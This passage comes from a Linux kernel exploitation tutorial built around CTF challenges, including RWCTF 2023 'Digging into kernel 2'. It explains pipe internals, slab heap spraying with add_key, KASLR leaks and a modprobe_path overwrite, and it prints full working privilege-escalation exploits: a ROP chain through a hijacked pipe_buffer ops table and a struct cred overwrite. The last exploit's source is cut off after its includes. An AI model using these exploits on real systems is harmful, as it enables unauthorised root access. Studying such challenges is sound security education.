struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

...

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT);

...
}

#define PIPE_DEF_BUFFERS 16

The chain therefore ends up allocating a struct pipe_inode_info, which on this challenge's kernel comes from kmalloc-192.

pipe_inode_info

/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @poll_usage: is this pipe used for epoll, which has crazy wakeups?
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
bool poll_usage;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs; //holds the pipe_buffer array
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

pipe_buffer

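Next, kcalloc allocates the pipe_buffer array of pipe_bufs * sizeof(struct pipe_buffer) bytes. pipe_bufs defaults to 16 (PIPE_DEF_BUFFERS), and the array comes from kmalloc-1k. If we can read pipe_inode_info, we therefore learn the address of this dynamically allocated chunk through pipe_inode_info->bufs.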

/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

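This structure lets us leak a kernel heap address, but it can do more: we can also use it to hijack control flow.

Let us look at how a pipe is released.

As mentioned above, a pipe has two file descriptors, one for reading and one for writing. The pipe is actually torn down once both have been closed.

To analyse the release path we need the release function. When a file descriptor is closed, the VFS does not care whether the file is a pipe or anything else. The only difference from closing other files is the release function in the file operations. Those operations are set in get_pipe_inode, which is called while the pipe is created: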

static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;

...

inode->i_fop = &pipefifo_fops;

...
}

const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};

So the pipe's release pointer is pipe_release, whose call chain is:

pipe_release
  put_pipe_info
    free_pipe_info
      pipe_buf_release
        pipe_buffer->ops->release()

In the end a function from pipe_buffer->ops is called. If we can overwrite the function table in a pipe_buffer, we gain control of execution when both ends of the pipe are closed.

pipe_buf_operations

Here is the pipe_buffer function table:

/*
* Note on the nesting of these functions:
*
* ->confirm()
* ->try_steal()
*
* That is, ->try_steal() must be called on a confirmed buffer. See below for
* the meaning of each operation. Also see the kerneldoc in fs/pipe.c for the
* pipe and generic variants of these hooks.
*/
struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

6. Exploitation

After all that background we can finally turn to the challenge itself. Recall what it gives us:

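  1. An ioctl handler that dispatches on cmd: 0xdeadbeef allocates a chunk and 0xc0decafe frees it. The freed pointer is left dangling, which gives us a UAF.
  2. The index used to store chunks can only be 0 or 1.
  3. KASLR, SMEP/SMAP and KPTI are enabled.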

The first problem to solve is leaking addresses.

Address leak

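We combine heap spraying with the add_key system call. Once add_key gives us a key ID, we can operate on the key through keyctl, as described above.

When a key's payload is freed, for example by revoking the key, call_rcu() stores user_free_payload_rcu in user_key_payload->rcu.func. That is a function in the kernel image. So after the free we can use the UAF to read the pointer back and recover the kernel base.

Here is how the heap spray and the leak work in this challenge: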

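  1. Build the UAF object: use the module's ioctl to allocate an object and then free it. Its pointer is not cleared, so we can keep using it. To match the later add_key calls, the object is allocated from kmalloc-192 (other sizes would work too).
  2. Spray user_key_payload. add_key first allocates a temporary object for the payload, then allocates a (header + payload) object for the user_key_payload, and finally frees the temporary one. The UAF object is therefore repeatedly handed out as the temporary payload and freed again, and it never ends up as a user_key_payload.
  3. This continues until the slab is exhausted. Suppose the only free object left in the slab is the temporary chunk that was just freed. The next add_key again takes the UAF object for the temporary payload, but now no object is left for the user_key_payload. The allocator gives up the current, now full, slab and takes a partial slab from kmem_cache_node to serve as the new kmem_cache_cpu->freelist, so the user_key_payload comes from that new slab. When the temporary payload (the UAF object) is freed afterwards, its slab ends up on the node as a partial slab.
  4. Keep spraying user_key_payload. This time the temporary payload is no longer taken from the UAF object, because the UAF object sits in the node rather than on cpu->freelist. Again the current slab fills up until only the one just-freed temporary chunk is left. The allocator then looks for a partial slab in the node, and the one it finds is the slab we just placed there, which contains the free UAF object. That slab becomes the new cpu->freelist, so the UAF object is finally allocated as a user_key_payload.
  5. To leak the kernel base later, we raise the datalen field in the header of the user_key_payload that occupies the UAF object. keyctl_read will then read past it into neighbouring user_key_payloads, and any of those whose payload has been freed contains the kernel pointer. So we free the UAF object and spray with the module's ioctl, using a buffer that holds a large value at the position of datalen. When one of these allocations lands on the freed UAF object, the datalen of its user_key_payload is overwritten.
  6. After step 5 datalen has been overwritten, but which key ID is the victim? As analysed above, keyctl_read returns user_key_payload->datalen. We loop over all keys, and any key whose read returns more than the 192 we allocated is the user_key_payload corrupted through the UAF object. Along the way every other key is revoked with keyctl_revoke, which frees its payload. An out-of-bounds read through the victim user_key_payload then reveals the kernel pointers in the headers of those payloads.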

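Control-flow hijacking

Here we hijack control flow with a pipe.

The source above shows what creating a pipe allocates. A pipe_inode_info comes from kmalloc-192, and a pipe_buffer array for pipe_inode_info->bufs comes from kmalloc-1k (which is also why a pipe can leak a kernel heap address). When both ends of the pipe are closed, the release() function in the pipe_buffer's ops table is called, so we can forge that table to take control. The detailed steps are: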

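  1. The module's array can hold two chunks at once, so we can easily get obj1 allocated as a user_key_payload. obj1 will later be reused as the pipe_inode_info.
  2. Allocate obj0 as a 1024-byte chunk from kmalloc-1k and free it, so that the later pipe_buffer allocation reuses it. Free obj1 as well, for the same reason.
  3. Call pipe, so that obj0 and obj1 are allocated as the pipe_buffer array and the pipe_inode_info respectively.
  4. The pipe_inode_info and the user_key_payload now share obj1. Calling keyctl_read with a size of 0xffff reads the pipe_inode_info. The field overlapping datalen now holds a large value, about 0x2000 in testing, so we learn the address of the pipe_buffer array. We can then free obj0 and allocate it again to overwrite the pipe_buffer and forge a function table inside it.
  5. Finally, close both file descriptors to trigger the hijack and escalate privileges.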

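Finding gadgets here is hard, and kernel gadgets behave differently from userland ones. In userland, short gadgets are usually enough. In the kernel, tools such as ROPgadget and ropper often fail to find the gadgets we need. As 国资 explained, these tools end a gadget at the first instruction that changes rip, so longer kernel gadgets that involve several control transfers are not listed. Oddly, objdump did not show them either. On mole's advice, ROPgadget's opcode search can be used instead: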

ROPgadget --binary <file> --opcode <hex-encoded instruction bytes>

One more detail: in pipe_inode_info the bufs field is at offset 0x98, which was determined by debugging.

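This challenge actually has a simpler way to hijack control flow. The main goal of this section, however, is to learn the heap-spraying steps, so we follow arttnba3's approach.

Here is the exp: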

#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <syscall.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <sys/syscall.h>

#define PIPE_NODE_INFO_SZ 192
#define PIPE_BUFFER_SZ 1024
#define KEY_SPRAY_NUM 40

#define USER_FREE_PAYLOAD_RCU 0xffffffff813d8210
#define POP_RBX_POP_RBP_POP_R12_RET 0xffffffff81250ca4
#define PUSH_RSI_POP_RSP_POP_RBX_POP_RBP_POP_R12_RET 0xffffffff81250c9d
#define POP_RDI_RET 0xffffffff8106ab4d
#define XCHG_RDI_RAX_DEC_RET 0xffffffff81adfc70
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE 0xffffffff81e00ed0

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */

/* keyctl commands */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */
size_t kernel_base = 0xffffffff81000000; /* default (non-KASLR) x86_64 kernel text base */


int rwctf_fd;
size_t commit_creds = 0xffffffff81095c30;
size_t prepare_kernel_cred = 0xffffffff81096110;

struct userarg{
uint32_t idx;
uint32_t size;
void* buf;
};


#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, (void *)(x))

void saveStatus();
void info_log(char*);
void error_log(char*);
int key_alloc(char*, void*, size_t);

size_t user_cs, user_ss,user_rflags,user_sp;


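/* save user-mode cs/ss/rsp/rflags for returning to userland; Intel-syntax asm, build with -masm=intel */
void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("Status has been saved successfully!");
}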


/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
info_log("bound to core successfully");
}

void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(EXIT_FAILURE);
}

void my_alloc(uint32_t idx, uint32_t size, void* buf){
struct userarg n = {
.idx = idx,
.size = size,
.buf = buf,
};
ioctl(rwctf_fd, 0xDEADBEEF, &n);
}

void my_delete(uint32_t idx){
struct userarg n = {
.idx = idx,
};
ioctl(rwctf_fd, 0xC0DECAFE, &n);
}

int key_alloc(char* description, void* payload, size_t plen){
return syscall(__NR_add_key, "user", description, payload, plen, KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int id, void* payload, size_t plen){
return syscall(__NR_keyctl, KEYCTL_UPDATE, id, payload, plen, NULL);
}
int key_revoke(int id){
return syscall(__NR_keyctl, KEYCTL_REVOKE, id, NULL, NULL, NULL);
}
int key_read(int id, void* buffer, size_t buflen){
return syscall(__NR_keyctl, KEYCTL_READ, id, buffer, buflen, NULL);
}
int key_unlink(int id){
return syscall(__NR_keyctl, KEYCTL_UNLINK, id, KEY_SPEC_PROCESS_KEYRING, NULL, NULL);
}

void get_root(){
system("/bin/sh");
}

int main(void){
bind_cpu(0);
saveStatus();
size_t* buf;
char description[0x50];
int key_id[KEY_SPRAY_NUM];
int victim_key_idx = -1, pipe_key_id;
size_t kernel_offset = (size_t)-1; /* KASLR slide; (size_t)-1 means "not found yet" */
int pipe_fd[2], pipe_key_ret;
size_t pipe_buffer_addr;

buf = malloc(sizeof(size_t)*0x4000);

rwctf_fd = open("/dev/rwctf", O_RDONLY);
if(rwctf_fd < 0){
error_log("failed to open /dev/rwctf!");
}

/*
* construct the UAF obj,we just alloc and then free it to the cpu->freelist
* */
info_log("Construct the UAF obj");
my_alloc(0, PIPE_NODE_INFO_SZ, buf);
my_delete(0);


/*
* the UAF obj keeps being used for the temporary payload, and a new obj is allocated for the user_key_payload,
* so we exhaust the current cpu->freelist by spraying user_key_payload;
* the current slab is then given up and a new slab is used for allocation,
* and finally the UAF obj ends up in a partial slab on the kmem_cache_node
* ======================================================================================
* 1. use user_key_payload to fill the cpu freelist
* 2. then the current slab is given up
* 3. during that key_alloc the temporary payload is freed last, so the UAF obj is freed into the node's partial slab
* 4. the next temporary payload comes from another slab (the current cpu->freelist)
* 5. after that, keep spraying to fill the current slab
* 6. when the current slab is full, the node slab becomes the cpu freelist and the UAF obj is used for a user_key_payload
* */
info_log("Starting spraying the user_key_payload");
for(int i = 0; i < KEY_SPRAY_NUM; i++){
snprintf(description, 0x50, "%s%d", "peiwithhao", i);
key_id[i] = key_alloc(description, buf, PIPE_NODE_INFO_SZ - 0x18); //0x18 is the user_key_payload head
if(key_id[i] < 0){
error_log("key alloc failed!");
}
}

//the UAF obj is now allocated as a user_key_payload
my_delete(0);
//free the UAF obj and reallocate it in a second spray, so we can modify the user_key_payload
//buf[2] covers user_key_payload->datalen (offset 0x10): make it large
info_log("Starting spraying the uaf obj");
buf[0] = 0;
buf[1] = 0;
buf[2] = 0x2000;
for(int i = 0;i < (KEY_SPRAY_NUM*2); i++){
my_alloc(0, PIPE_NODE_INFO_SZ, buf);
}
info_log("Sprayed nearly four slabs, it should be overwritten!");

for(int i = 0; i < KEY_SPRAY_NUM; i++){
if(key_read(key_id[i], buf, 0x4000) > PIPE_NODE_INFO_SZ){
printf("[*]Found the victim key_idx : %d\n", i);
victim_key_idx = i;
}else{
key_revoke(key_id[i]); //revoking frees the payload via call_rcu(), which stores user_free_payload_rcu() in the payload's rcu_head
}
}
if(victim_key_idx == -1){
error_log("Found the victim key_id failed:(");
}
info_log("victim key_id founded!");

/* find the rcu_head->callback_head */
for(int i = 0; i < 0x2000/8 ; i++){
if((buf[i]&0xfff) == 0x210){
kernel_offset = buf[i] - USER_FREE_PAYLOAD_RCU;
kernel_base += kernel_offset;
break;
}
}
if(kernel_offset == -1){
error_log("can not find the kernel offset");
}
PRINT_ADDR("Kernel_base", kernel_base);
PRINT_ADDR("Kernel_offset", kernel_offset);

/*
* Let the user_key_payload and pipe_inode_info belong to the same obj
*
* */
/* Construct the freelist 0->1 */
my_alloc(0, PIPE_NODE_INFO_SZ, buf);
my_alloc(1, PIPE_NODE_INFO_SZ, buf);
my_delete(1);
my_delete(0);
/* 1 object will be the user_key_payload */
pipe_key_id = key_alloc("peiwithhao", buf, PIPE_NODE_INFO_SZ - 0x18);
my_delete(1);
/* prepare for the pipe buffer */
my_alloc(0, PIPE_BUFFER_SZ, buf);
my_delete(0);
pipe(pipe_fd);

info_log("Starting control the process");
pipe_key_ret = key_read(pipe_key_id, buf, 0xffff);

pipe_buffer_addr = buf[16]; //leak the bufs
PRINT_ADDR("pipe_buffer addr", pipe_buffer_addr);
memset(buf, 'A', sizeof(size_t) * 0x4000); //buf is a pointer, so sizeof(buf) would only cover 8 bytes

/* ROP chain construct */
buf[0] = *(size_t*)"peiwhhao";
buf[1] = *(size_t*)"peiwithhao";
buf[2] = pipe_buffer_addr + 0x18;
buf[3] = POP_RBX_POP_RBP_POP_R12_RET + kernel_offset;
buf[4] = PUSH_RSI_POP_RSP_POP_RBX_POP_RBP_POP_R12_RET + kernel_offset; //release()
buf[5] = *(size_t*)"peiwhhao";
buf[6] = *(size_t*)"peiwhhao";
buf[7] = POP_RDI_RET + kernel_offset;
buf[8] = 0; //rdi = NULL for prepare_kernel_cred(NULL)
buf[9] = prepare_kernel_cred + kernel_offset;
buf[10] = XCHG_RDI_RAX_DEC_RET + kernel_offset;
buf[11] = commit_creds + kernel_offset;
buf[12] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE + kernel_offset + 0x31;
buf[13] = *(size_t*)"peiwhhao";
buf[14] = *(size_t*)"peiwhhao";
buf[15] = (size_t)get_root;
buf[16] = user_cs;
buf[17] = user_rflags;
buf[18] = user_sp + 8;
buf[19] = user_ss;


my_delete(0);
my_alloc(0, PIPE_BUFFER_SZ, buf);

close(pipe_fd[0]);
close(pipe_fd[1]);
}

VI. Kernel Heap - Arbitrary Write/Read

Example: RWCTF 2023 Trial Round - Digging into kernel 2

1. Reversing the challenge

int __cdecl xkmod_init()
{
kmem_cache *v0; // rax

printk(&unk_1E4);
misc_register(&xkmod_device);
v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
buf = 0LL;
s = v0;
return 0;
}

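At module init it registers a misc device and then creates its own kmem_cache. Because no extra flags are passed, the kmalloc alias (slab merging) mechanism lets this kmem_cache be merged with the kernel's generic kmalloc-192, which is probably not what the author intended.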

The bug is in the code that runs when the device is closed: it leaves a UAF.

int __fastcall xkmod_release(inode *inode, file *file)
{
return kmem_cache_free(s, buf);
}

2. easy mode

First, let's exploit the author's slip to do a relatively simple kernel pwn. The idea:

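  1. Open the vulnerable device several times. All of the opened instances share the same global buf pointer, which lives in the module's .bss.
  2. Close one of them. xkmod_release frees the object but never sets buf to NULL, which leaves a dangling pointer.
  3. The chunk buf points to is now on the freelist, so the next 192-byte allocation will hand it out again.
  4. Pick struct cred, whose size fits exactly (a fork() allocates one for the child). Then use the module's ioctl commands through a still-open fd to set the process's uid, gid, etc. to 0.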
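The exploit below treats the leaked object as a struct cred when ((int *)data.buffer)[3] == 0x3e8. Here is a minimal sketch of why that check works. It assumes a 5.x struct cred built without CONFIG_DEBUG_CREDENTIALS, so usage is immediately followed by the IDs. cred_head is a hypothetical userland mirror of the first fields, not a kernel type. Under that assumption, int index 3 is suid, which is 1000 for the unprivileged user.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the head of struct cred
 * (assumption: 5.x kernel, CONFIG_DEBUG_CREDENTIALS disabled). */
struct cred_head {
    int32_t  usage;      /* atomic_t refcount */
    uint32_t uid;        /* kuid_t values */
    uint32_t gid;
    uint32_t suid;
    uint32_t sgid;
    uint32_t euid;
    uint32_t egid;
    uint32_t fsuid;
    uint32_t fsgid;
    uint32_t securebits;
};

/* Index of a field when the object is viewed as an int array, as the exploit does. */
#define INT_INDEX(field) (offsetof(struct cred_head, field) / sizeof(int))

/* Returns 1 if the leaked object looks like the cred of uid 1000. */
int looks_like_user_cred(const int *obj)
{
    return obj[INT_INDEX(uid)] == 1000 && obj[INT_INDEX(suid)] == 1000;
}
```

Under the same assumption, the exploit's loop that zeroes indices 0 to 9 clears usage as well as every ID up to securebits.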

The exploit:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/ioctl.h>   // ioctl()
#include <sys/wait.h>    // wait()
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>

struct user_arg{
void *buffer;
int offset, size;
}data;


void alloc_kernelmem(int dev_fd){
ioctl(dev_fd, 0x1111111, &data);
}

void get_kernelmsg(int dev_fd){
ioctl(dev_fd, 0x7777777, &data);
}

void put_usermsg(int dev_fd){
ioctl(dev_fd, 0x6666666, &data);
}


int main(void){
int dev_fd[2];
size_t buf[0x1000] = {0};
size_t length = 0x50;
data.buffer = malloc(0x100);
data.offset = 0;
data.size = 0x50;
for(int i = 0; i < 2; i++){
dev_fd[i] = open("/dev/xkmod", O_RDONLY);
}
printf("step1\n");
alloc_kernelmem(dev_fd[0]);
close(dev_fd[0]);
printf("step2:\n");
int pid = fork();
if(!pid){ //child process
get_kernelmsg(dev_fd[1]);
if(((int *)data.buffer)[3] == 0x3e8){
for(int i = 0; i < 10; i++){
((int *)data.buffer)[i] = 0;
}
put_usermsg(dev_fd[1]);
if(!getuid()){
puts("[+]Get Root Priviledge!");
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/sh");
exit(0);
}
}
}
wait(NULL);
exit(1);
}

3. normal mode

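In easy mode we already managed to read the UAF object. What we read back also reveals the freelist pointer offset of the author's kmem_cache. During testing, the first 8 bytes of the UAF chunk were generally a kernel heap address, so we infer that each free object stores its next-free pointer at offset 0.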

While studying arttnba3's blog, I found that it documents two kernel config options that harden the slab allocator:

config SLAB_FREELIST_RANDOM
bool "Randomize slab freelist"
depends on SLAB || SLUB
help
Randomizes the freelist order used on creating new pages. This
security feature reduces the predictability of the kernel slab
allocator against heap overflows.

config SLAB_FREELIST_HARDENED
bool "Harden slab freelist metadata"
depends on SLUB
help
Many kernel heap attacks try to target slab cache metadata and
other infrastructure. This options makes minor performance
sacrifices to harden the kernel slab allocator against common
freelist exploit methods.

The first one shuffles the freelist order whenever a new slab page is created, so the freelist starts out in random order.

When this first option is set to y, kmem_cache also gains an extra field, random_seq, which holds the precomputed shuffle sequence:

/*
* Slab cache management.
*/
struct kmem_cache {
...

#ifdef CONFIG_SLAB_FREELIST_RANDOM
unsigned int *random_seq;
#endif

...
struct kmem_cache_node *node[MAX_NUMNODES];
};

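The second option, SLAB_FREELIST_HARDENED, works much like glibc's safe-linking: the pointer to the next free object is XORed with a value before it is stored. Here that value is not random_seq. It is the per-cache secret s->random combined with the byte-swapped address where the pointer is stored: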

/*
* Returns freelist pointer (ptr). With hardening, this is obfuscated
* with an XOR of the address where the pointer is held and a per-cache
* random number.
*/
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
/*
* When CONFIG_KASAN_SW/HW_TAGS is enabled, ptr_addr might be tagged.
* Normally, this doesn't cause any issues, as both set_freepointer()
* and get_freepointer() are called with a pointer with the same tag.
* However, there are some issues with CONFIG_SLUB_DEBUG code. For
* example, when __free_slub() iterates over objects in a cache, it
* passes untagged pointers to check_object(). check_object() in turns
* calls get_freepointer() with an untagged pointer, which causes the
* freepointer to be restored incorrectly.
*/
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}

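The code shows that, with hardening enabled, the freelist pointer is XORed with a random value and with its own storage address. In this challenge the leaked pointers show no trace of such XORing, so we conclude that the two options are configured as follows: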

CONFIG_SLAB_FREELIST_HARDENED = 'n'
CONFIG_SLAB_FREELIST_RANDOM = 'y'

In addition, the next pointer sits at offset 0 within the object.
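Here is a userland sketch of the CONFIG_SLAB_FREELIST_HARDENED encoding from freelist_ptr() above, with the KASAN tag handling dropped. cache_random stands in for s->random. The looks_like_raw_heap_ptr() heuristic (top 16 bits all set, as for a direct-map address) is an assumption. It only illustrates the "no XOR traces" argument and is not a reliable test.

```c
#include <assert.h>
#include <stdint.h>

/* stored = ptr ^ s->random ^ swab(ptr_addr), as in freelist_ptr() */
uint64_t freelist_encode(uint64_t ptr, uint64_t cache_random, uint64_t ptr_addr)
{
    return ptr ^ cache_random ^ __builtin_bswap64(ptr_addr);
}

/* XOR is its own inverse, so decoding is the same operation. */
uint64_t freelist_decode(uint64_t stored, uint64_t cache_random, uint64_t ptr_addr)
{
    return freelist_encode(stored, cache_random, ptr_addr);
}

/* Heuristic: an unencoded next pointer looks like a kernel direct-map address. */
int looks_like_raw_heap_ptr(uint64_t stored)
{
    return (stored >> 48) == 0xffff;
}
```

With hardening off, the value at offset 0 of a free object is the raw pointer itself, which matches what the easy-mode leak showed.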

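Since we know a heap address, we can guess the start of the kernel heap (page_offset_base). This writeup assumes KASLR randomizes it at 256 MB granularity, so masking off the low bits of the leak gives a candidate. The qword at page_offset_base + 0x9d000 holds the address of the kernel function secondary_startup_64, which is always 0x30 bytes above the kernel base. Reading that slot therefore both checks whether our page_offset_base guess is correct and gives us the kernel base.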
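The page_offset_base guess and its check reduce to plain arithmetic. This sketch uses the constants from this writeup: the 256 MB mask, the slot at +0x9d000, secondary_startup_64 at kernel base + 0x30, and the default base 0xffffffff81000000. These values are specific to this challenge's kernel and are assumptions anywhere else. The -0x10 mirrors the exploit, which points the fake next pointer 0x10 bytes before the slot and then reads the slot back at qword index 2.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_OFFSET_MASK        0xfffffffff0000000ULL /* 256 MB granularity (assumed) */
#define SECONDARY_STARTUP_SLOT  0x9d000ULL            /* page_offset_base + 0x9d000 */
#define SECONDARY_STARTUP_DELTA 0x30ULL               /* secondary_startup_64 - kernel base */
#define DEFAULT_KERNEL_BASE     0xffffffff81000000ULL

uint64_t guess_page_offset_base(uint64_t leaked_heap_ptr)
{
    return leaked_heap_ptr & PAGE_OFFSET_MASK;
}

/* Fake freelist "next" value written by the exploit before two allocations. */
uint64_t fake_next_for_probe(uint64_t page_offset_base)
{
    return page_offset_base + SECONDARY_STARTUP_SLOT - 0x10;
}

/* Kernel base from the qword read at the slot, or 0 if the low-12-bit check fails. */
uint64_t kernel_base_from_probe(uint64_t qword_at_slot)
{
    if ((qword_at_slot & 0xfff) != SECONDARY_STARTUP_DELTA)
        return 0;
    return qword_at_slot - SECONDARY_STARTUP_DELTA;
}
```

The kernel offset used for the rest of the exploit is then kernel_base - DEFAULT_KERNEL_BASE.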

Once we know the kernel base, we can turn our control of the freelist into an arbitrary write. So where exactly should we write?

This introduces a privilege-escalation technique: overwriting modprobe_path. Its address can be found with a small trick:

/*
modprobe_path is set via /proc/sys.
*/
char modprobe_path[KMOD_PATH_LEN] = CONFIG_MODPROBE_PATH;

As root, /proc/sys/kernel/modprobe shows its default value, which is usually /sbin/modprobe:

/ # cat /proc/sys/kernel/modprobe   
/sbin/modprobe

How do we find the address of modprobe_path? The source shows that __request_module() checks it:

int __request_module(bool wait, const char *fmt, ...)
{
...

if (!modprobe_path[0])
return -ENOENT;

...
}

So let's look at its disassembly:

ffffffff8108c690 <__request_module>:                                                                     
ffffffff8108c690: 55 push rbp
ffffffff8108c691: 48 89 e5 mov rbp,rsp
ffffffff8108c694: 41 56 push r14
ffffffff8108c696: 41 55 push r13
ffffffff8108c698: 41 54 push r12
ffffffff8108c69a: 49 89 f4 mov r12,rsi
ffffffff8108c69d: 41 52 push r10
ffffffff8108c69f: 4c 8d 55 10 lea r10,[rbp+0x10]
ffffffff8108c6a3: 53 push rbx
ffffffff8108c6a4: 4d 89 d5 mov r13,r10
ffffffff8108c6a7: 89 fb mov ebx,edi
ffffffff8108c6a9: 48 81 ec b0 00 00 00 sub rsp,0xb0
ffffffff8108c6b0: 48 89 55 b8 mov QWORD PTR [rbp-0x48],rdx
ffffffff8108c6b4: 48 89 4d c0 mov QWORD PTR [rbp-0x40],rcx
ffffffff8108c6b8: 4c 89 45 c8 mov QWORD PTR [rbp-0x38],r8
ffffffff8108c6bc: 4c 89 4d d0 mov QWORD PTR [rbp-0x30],r9
ffffffff8108c6c0: 65 48 8b 04 25 28 00 mov rax,QWORD PTR gs:0x28
ffffffff8108c6c7: 00 00
ffffffff8108c6c9: 48 89 45 a0 mov QWORD PTR [rbp-0x60],rax
ffffffff8108c6cd: 31 c0 xor eax,eax
ffffffff8108c6cf: 40 84 ff test dil,dil
ffffffff8108c6d2: 0f 85 80 01 00 00 jne ffffffff8108c858 <__request_module+0x1c8>
ffffffff8108c6d8: 80 3d 21 80 3b 01 00 cmp BYTE PTR [rip+0x13b8021],0x0 # ffffffff82444700

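At the very bottom there is exactly one cmp that compares a global byte with 0. This is the !modprobe_path[0] check, so the byte it reads (0xffffffff82444700 in the objdump comment, before KASLR) is modprobe_path. All we need to do is use the arbitrary write to change it to the path of a file we want executed, and the kernel will run that file with root privileges.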
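The address in the objdump comment can be checked by hand. A RIP-relative operand is relative to the address of the next instruction. Here cmp BYTE PTR [rip+disp32], imm8 is encoded as 80 3d, then the 4-byte displacement, then the 1-byte immediate: 7 bytes in total, with the displacement starting at byte 2. A small sketch of the decoding:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* target = address of the next instruction + signed 32-bit little-endian displacement */
uint64_t riprel_target(uint64_t insn_addr, size_t insn_len, const uint8_t *disp_bytes)
{
    int32_t disp = (int32_t)((uint32_t)disp_bytes[0] |
                             (uint32_t)disp_bytes[1] << 8 |
                             (uint32_t)disp_bytes[2] << 16 |
                             (uint32_t)disp_bytes[3] << 24);
    return insn_addr + insn_len + (int64_t)disp;
}
```

For the instruction at 0xffffffff8108c6d8, this gives 0xffffffff8108c6df + 0x13b8021 = 0xffffffff82444700, the MODPROBE_PATH constant used in the exploit.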

The exploit below puts all of this together:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
